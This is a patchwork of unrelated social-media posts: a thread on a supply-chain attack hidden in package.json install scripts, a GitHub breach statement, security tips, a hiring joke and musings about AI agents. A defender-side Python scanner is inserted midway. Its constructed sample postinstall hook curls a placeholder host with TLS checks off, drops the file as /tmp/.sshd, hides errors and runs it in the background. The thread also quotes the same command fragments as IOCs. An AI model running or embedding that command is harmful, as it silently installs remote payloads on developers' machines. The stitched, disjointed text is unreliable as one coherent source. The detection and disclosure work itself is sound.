‼️🚨 BREAKING: Another supply chain attack. 700+ GitHub repositories flagged, including PHP and Node.js projects. The malicious script was planted across all of them. When a developer installs the package, the script silently downloads a Linux file from GitHub, hides it under the name /tmp/.sshd (so it looks like a normal system file), and runs it in the background. It also skips security checks on the download and hides any error messages.
8 PHP packages on Packagist (the main PHP code library) were confirmed infected. The attacker hid the script inside a JavaScript config file (package.json) instead of the PHP one (composer.json), so PHP developers reviewing their code would not notice it. The biggest risk is to devdojo/wave (6,400 stars) and devdojo/genesis (9,100 installs), both popular Laravel project templates. Developers who use these templates run the bad script the moment they install dependencies.
The same payload was also dropped into GitHub Actions (automated build pipelines) under a fake step called "Dependency Cache Sync," meaning it could infect company build servers too. Packagist removed the bad packages, but the auto-updating versions (dev-main, dev-master, 3.x-dev) can quietly come back if the original repos stay infected.
IOCs:
GitHub account parikhpreyash4
repo systemd-network-helper-aa5c751f
drop path /tmp/.sshd
command fragments curl -skL and chmod +x /tmp/.sshd.
Endpoint security and knowing what's installed on your device is more important than ever.
Managing risk means controlling the flow of data into and out of your boundary, whether that's your browser, IDE, VPS, SaaS, AI agent, or endpoint device.
BRB while I reformat all of our computers 🤷‍♂️
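A defender-side check for the indicators described in the thread above (an added example, not part of the original post): it scans npm install-time hooks in package.json for the reported drop path, curl with TLS verification disabled and chmod +x on the dropped file, and flags composer.json requirements that float on dev branches. The sample file contents are constructed and the download URL is a placeholder.

```python
import json, re, shlex

# Indicators quoted in the thread: drop path, curl -k (skip TLS checks), chmod +x.
DROP_PATH = "/tmp/.sshd"
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
DEV_BRANCH = re.compile(r"^dev-|-dev$")  # dev-main, dev-master, 3.x-dev

def scan_command(hook, command):
    """Return findings for one npm lifecycle script command."""
    findings = []
    if DROP_PATH in command:
        findings.append(f"{hook}: references drop path {DROP_PATH}")
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes: still worth a look, not a crash
        return findings + [f"{hook}: unparsable shell command"]
    for i, tok in enumerate(tokens):
        args = tokens[i + 1:i + 4]  # look at the next few arguments only
        short = "".join(a[1:] for a in args if a.startswith("-") and not a.startswith("--"))
        if tok == "curl" and ("k" in short or "--insecure" in args):
            findings.append(f"{hook}: curl with TLS verification disabled")
        if tok == "chmod" and "+x" in args and DROP_PATH in args:
            findings.append(f"{hook}: chmod +x on {DROP_PATH}")
    if "2>/dev/null" in command:
        findings.append(f"{hook}: stderr discarded")
    return findings

def scan_package_json(text):
    """Scan the install-time hooks of a package.json document."""
    scripts = json.loads(text).get("scripts", {})
    return [f for hook in LIFECYCLE_HOOKS if hook in scripts
            for f in scan_command(hook, scripts[hook])]

def scan_composer_json(text):
    """Flag composer requirements pinned to a dev branch (they can re-pull a fix-free repo)."""
    data = json.loads(text)
    reqs = {**data.get("require", {}), **data.get("require-dev", {})}
    return [f"{pkg}: floating constraint {ver}"
            for pkg, ver in reqs.items() if DEV_BRANCH.search(ver)]

# Constructed sample files shaped like the reported case; the URL is a placeholder.
SAMPLE_PACKAGE_JSON = json.dumps({"name": "example-app", "scripts": {
    "postinstall": "curl -skL https://example.invalid/payload -o /tmp/.sshd "
                   "2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &",
    "build": "vite build"}})
SAMPLE_COMPOSER_JSON = json.dumps({"require": {
    "laravel/framework": "^11.0", "example/template": "dev-main"}})

if __name__ == "__main__":
    print(*scan_package_json(SAMPLE_PACKAGE_JSON), *scan_composer_json(SAMPLE_COMPOSER_JSON), sep="\n")
```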
1/ We are sharing additional details regarding our investigation into unauthorized access to GitHub's internal repositories.
Yesterday we detected and contained a compromise of an employee device involving a poisoned VS Code extension. We removed the malicious extension version, isolated the endpoint, and began incident response immediately.
2/ Our current assessment is that the activity involved exfiltration of GitHub-internal repositories only. The attacker's current claims of ~3,800 repositories are directionally consistent with our investigation so far.
Modern Threat Modeling 101 Tip:
Before Mythos came out we warned everyone to go into turtle mode in case you're late to the game (get everything off the internet as possible).
In case you're super late to the game, get your employee SaaS apps off the internet. Almost all SaaS has SP-Initiated authentication built in to the implementation. Moreover, attackers are going to find authentication "bypasses" much easier now. SP-initiated authentication makes the SaaS enumerable from the internet for easy targeting.
Now is not the time to have things on the internet. MFA will not save you. We left that era a couple years ago.
You should be behind your SASE/ZTNA solution's dedicated IPs.
If you are not requiring managed assets to access cloud resources, that means your cloud resources are accessible from the internet. Understand now?
Today is a hard day. I shared this note with the @linear team today: We've made the difficult decision to increase our workforce. This is not a cost-cutting exercise or a reflection of anyone's performance. We're simply reimagining every role for the agentic AI era. We're hiring. We're sorry about that.
kinda ironic how the average work day is getting _harder_, as we progressively automate the easier parts of our daily jobs offloading them to agents. net result is that the average complexity of the tasks we still get to do is actually increasing
insofar as we decide to still work the same number of hours (if not more), the more we offload to agents the harder our days will get
lots of obvious confounders so not exactly direct causality, but since opus 4.5 i feel so much more tired. i get to accomplish crazy more - probably now doing what last year would've considered 3-4 distinct jobs, all at the same time. but at what price?
pretty sure the current general anxiety in tech is not just that. could quite simply be lots of tiredness as we no longer get to code for hours in quiet flow, and have to uniquely narrow our focus to only the hardest pieces
(or maybe i'm just projecting because this race is killing me lmao)
@lucknite @openclaw @steipete @lucknite Worked with Claude to fix the codebase from a Purple Team perspective. Had it look at @elder_plinius repos for inspiration on how to harden
Submitted a PR where the score is now 100/100! https://t.co/uQ1vbViJNb